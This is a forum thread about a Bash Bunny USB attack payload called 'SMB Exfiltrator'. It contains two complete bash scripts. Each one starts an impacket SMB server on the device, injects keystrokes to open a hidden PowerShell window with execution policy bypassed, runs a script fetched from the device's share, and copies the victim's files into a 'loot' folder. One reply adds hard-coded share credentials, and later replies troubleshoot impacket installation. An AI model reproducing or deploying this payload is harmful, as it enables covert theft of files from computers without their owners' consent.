Jump to content

Fixed the SMB Exfiltrator :)


jblk01
 Share

Recommended Posts

Was having the blinking blue LED issue like a few other commenters, decided to fsck around and see what's what.  Fixed it and added SMBv2 support to the script, with no changes made to the PowerShell script (s.ps1).  @Darren Kitchen any chance these changes can be reflected on the official Github repo?

 

#!/bin/bash
# LED STATUS
# ==========
# FAIL........Failed to find dependencies
# STAGE2......Ethernet Stage
# SETUP.......HID Stage
# SPECIAL.....Receiving Files
# CLEANUP.....Moving Liberated Files
# FINISH......Finished
#
# OPTIONS
# =======
# Exfiltration options configured from included s.ps1 script
 
 
 
######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION
# Make temporary loot directory
mkdir -p /loot/smb/
# Delete any old exfiltration data
rm -rf /loot/smb/*
# Copy new powershell payload to smb share
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
# Make loot directory on USB Disk
mkdir -p /root/udisk/loot/smb_exfiltrator
 
 
######## ETHERNET STAGE ########
LED STAGE2
ATTACKMODE RNDIS_ETHERNET
# Start the SMB Server
python /tools/impacket/examples/smbserver.py -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
# Re-enable ICMP/echo replies to trip the powershell stager
echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
 
 
######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
GET HOST_IP
LED SETUP
ATTACKMODE HID RNDIS_ETHERNET
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
LED B 100
# Wait until files are done copying.
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
 
 
 
######## CLEANUP ########
LED CLEANUP
# Delete EXFILTRATION_COMPLETE file
rm -rf /loot/smb/EXFILTRATION_COMPLETE
# Move files to udisk loot directory
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
# Clean up temporary loot directory
rm -rf /loot/smb/e/*
# Sync file system
sync
 
 
######## FINISH ########
# Trap is clean
LED FINISH

 

Link to comment
Share on other sites

  • 2 weeks later...
  • 1 year later...

the above didnt work for me, windows 10.

 

i had to edit this line and pass the username and password

RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) {NET USE \\172.16.64.1\IPC$ /u:root hak5bunny; \\\\$HOST_IP\\s\\s.ps1; exit;}; sleep 1;  }\""

specifically this part:

NET USE \\172.16.64.1\IPC$ /u:root hak5bunny;

  • Like 1
Link to comment
Share on other sites

  • 4 weeks later...
Posted (edited)

Hey @joeservo, sorry that I'm late.  I realized that I partially rewrote the script and didn't share it here, I apologize for that.  Here it is for both you and others if need be:

 

#!/bin/bash
#
# Title:         Faster SMB Exfiltrator version 2.0
# Author:        Hak5Darren
# Props:         ImNatho, mike111b, madbuda, jblk01
# Version:       1.6.1
# Category:      Exfiltration
# Target:        Windows XP SP3+ (Powershell)
# Attackmodes:   HID, Ethernet
#
# REQUIREMENTS
# ============
# SETUP:
#
# 1. apt update ; apt install gcc
# 2. pip install impacket
# 3. cd /tools/
# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
#
#
# LED STATUS
# ==========
# FAIL........Failed to find dependencies
# STAGE1......Ethernet Stage
# STAGE2......HID Stage
# SPECIAL.....Receiving Files
# CLEANUP.....Moving Liberated Files
# FINISH......Finished
#
# OPTIONS
# =======
# Exfiltration options configured from included s.ps1 script


######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION
# Make temporary loot directory
mkdir -p /loot/smb/
# Delete any old exfiltration data
rm -rf /loot/smb/*
# Copy new powershell payload to smb share
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
# Make loot directory on USB Disk
mkdir -p /root/udisk/loot/smb_exfiltrator


######## ETHERNET STAGE ########
LED STAGE1
ATTACKMODE RNDIS_ETHERNET
# Start the SMB Server
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &


######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
GET HOST_IP
LED STAGE2
ATTACKMODE HID RNDIS_ETHERNET
RUN WIN powershell
Q DELAY 1000
Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
Q DELAY 500
Q ENTER
LED SPECIAL
# Wait until files are done copying
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done


######## CLEANUP ########
LED CLEANUP
# Delete EXFILTRATION_COMPLETE file
rm -rf /loot/smb/EXFILTRATION_COMPLETE
# Move files to udisk loot directory
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
# Clean up temporary loot directory
rm -rf /loot/smb/e/*
# Sync file system
sync


######## FINISH ########
# Trap is clean
LED FINISH

 

Edited by jblk01
Link to comment
Share on other sites

  • 2 weeks later...

Hello,

 

@jblk01 it didnt work for me in Windows10

The LED ist blinking Blue and these for hours..

I got this in run

powershell -WindowStyle Hidden -Exec Bypass "While ($true) { If ((New-Object net.sockets.tcpclient (172.16.64.1,445)).Connected) { \\

 

 

Link to comment
Share on other sites

Which version of the payload did you use? The first one posted or the rewritten one further down? The string you are referring to is part of the first post/version, but not the second (newer) one. Try the rewritten one posted on the 4th of July instead.

Link to comment
Share on other sites

when i start the smb server manually i get this error

 

root@bunny:~# python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
[1] 9623
root@bunny:~# usage: smbserver.py [-h] [-comment COMMENT] [-debug] [-smb2support] shareName sharePath
smbserver.py: error: unrecognized arguments: -username -password s /loot/smb
 

The Content of the smbserver.log

  GNU nano 2.2.6             File: smbserver.log

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Link to comment
Share on other sites

In what way did you get Impacket onto the Bunny? Downloaded from Github as per the instructions in the post from the 4th of July or installed using deb package? Your log indicates an older version (0.9.16-dev) than the payload script expects (0.9.19).

Link to comment
Share on other sites

can i uninstall the 0.9.16-dev on the bashbunny? 

Or do I just have to copy the new version from github?

 

after copy the new version is this the content of the smbserver.log

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

 

But when i try to start the smb server i get this


[1] 2243
root@bunny:/loot# Traceback (most recent call last):
  File "/tools/impacket/examples/smbserver.py", line 85, in <module>
    server.addCredential(options.username, 0, lmhash, nthash)
AttributeError: SimpleSMBServer instance has no attribute 'addCredential'
 

 


 

Link to comment
Share on other sites

Posted (edited)

 

Hi @KinderRiegel, I was seeing the same error as you and i found a workaround:

Make sure your internet connection is shared with the Bunny.

Then on the Bunny:

First, do 'timedatectl set-time' followed by the current year, month and date.

Then, go into the /tools/impacket/ directory and run 'pip install -r requirements.txt'.

For me, this failed on a few requirements so I had to go in and:

 

'pip2 install setuptools-rust'

'pip2 install cryptography'

'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg'

'rm -f pyans1-0.4.8-py2.7.egg'

'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz'

'tar -xzvf pycryptodomex-3.10.1.tar.gz'

'cd pycryptodomex-2.10.1 && python setup.py install'

'cd /tools/impacket/ && python setup.py install'

 

And from there it was working properly. 🙂

 

Edited by jblk01
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...